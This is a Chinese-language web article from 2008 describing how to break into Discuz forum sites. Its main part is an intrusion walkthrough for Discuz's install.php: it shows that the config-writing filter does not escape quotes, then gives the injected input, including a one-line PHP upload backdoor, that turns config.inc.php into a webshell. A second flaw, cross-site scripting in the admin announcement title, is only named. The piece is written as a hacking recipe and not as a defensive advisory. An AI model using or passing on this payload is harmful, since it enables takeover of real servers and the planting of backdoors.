下一篇 » « 上一篇

两种Discuz网站漏洞的入侵方法

作者:    时间:2008-01-22    来源:    点击:36744    本文共1篇文章 字体:[ ]

两种Discuz网站漏洞的入侵方法

鸡肋1:install.php由于preg_grep过滤不严存在安全漏洞,可以直接拿webshell
如果你万幸发现install.php存在,但还没创建数据库账号,或者得到了数据库账号拿不到shell的时候,可以看看这个。

install.php的339-412行中对变量configfile进行了如下过滤

$configfile = preg_replace("/[$]dbhosts*=s*["'].*?["']/is", "$dbhost = '$dbhost'", $configfile);
$configfile = preg_replace("/[$]dbusers*=s*["'].*?["']/is", "$dbuser = '$dbuser'", $configfile);
$configfile = preg_replace("/[$]dbpws*=s*["'].*?["']/is", "$dbpw = '$dbpw'", $configfile);
............

意思是对$configfile文件中对$dbhost = ' '这样的匹配模式进行替换,这里并没有对单引号进行过滤,由于对主机,数据库名,密码等过滤规则是一样的,我们其中一个填写框中输入

www.444p.com


a';?>

;------------(这是第一次提交)
然后保存,保存得到信息可能会错数据库连接出错,没有关系,因为discuz的安装配置文件是先写入再判断的,然后你查看一下config.inc.php,会出现


$dbhost = 'a';?>'


这样的格式。
我们回到上一步,再保存一次---------------------(这是第二次提交)
这时你会看到config.inc.php已经被破坏了,会出现


$dbhost = 'a';?>';?>';


这样的情况,但现在是却是一种 这样完整的匹配模式了.
那我们在?>前面加上我们的一句话后门,就可以得到一个webshell了。
例如写入:
a';copy($_FILES[myfile][tmp_name],$_FILES[myfile][name])?>

重复写入两次就可以通过install.php上传php后门了。

鸡肋2:后台的发公告的标题存在跨站漏洞www.444p.com版权所有
责任编辑:semirock
发表评论
密码: (游客不需要密码)
记住我【Alt+S 或 Ctrl+Enter 快速提交】

搜索工具


《PHP教程》点击排行